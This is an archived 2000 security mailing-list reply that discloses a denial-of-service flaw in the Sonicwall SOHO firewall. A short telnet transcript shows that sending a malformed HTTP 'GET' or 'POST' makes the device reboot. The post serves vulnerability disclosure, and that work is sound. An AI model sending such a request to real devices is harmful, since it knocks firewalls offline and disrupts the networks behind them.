|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: Re: DoS in Sonicwall SOHO firewall
From: Raptor (raptor
ANTIFORK.ORG)Date: Fri Dec 01 2000 - 04:12:17 CST
- Next message: Shaun Clowes: "Re: Security problems with TWIG webmail system"
- Previous message: arieleisCOOLMAIL.NET: "(no subject)"
- Maybe in reply to: Raptor: "DoS in Sonicwall SOHO firewall"
- Maybe reply: Raptor: "Re: DoS in Sonicwall SOHO firewall"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Doing some additional tests i've discovered that the thing reboots also
when it receives "strange" HTTP requests. For example:
voodoo:~$ telnet 192.168.87.112 80
Trying 192.168.87.112...
Connected to 192.168.87.112.
Escape character is '^]'.
GET
(then press <CR>)
It works also with POST method: after some seconds the Sonicwall SOHO is
rebooted. I guess the HTTP service needs a full code review...
:raptor
On Wed, 29 Nov 2000, Scott Armstrong wrote:
> I had notified them a few weeks ago but the fix wasn't out so I didn't
> release it.
>
> The reason the firewall stops responding is that it reboots.
>
> Scott
Antifork Research, Inc. Mediaservice.net Srl
http://raptor.antifork.org http://www.mediaservice.net
- Next message: Shaun Clowes: "Re: Security problems with TWIG webmail system"
- Previous message: arieleisCOOLMAIL.NET: "(no subject)"
- Maybe in reply to: Raptor: "DoS in Sonicwall SOHO firewall"
- Maybe reply: Raptor: "Re: DoS in Sonicwall SOHO firewall"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]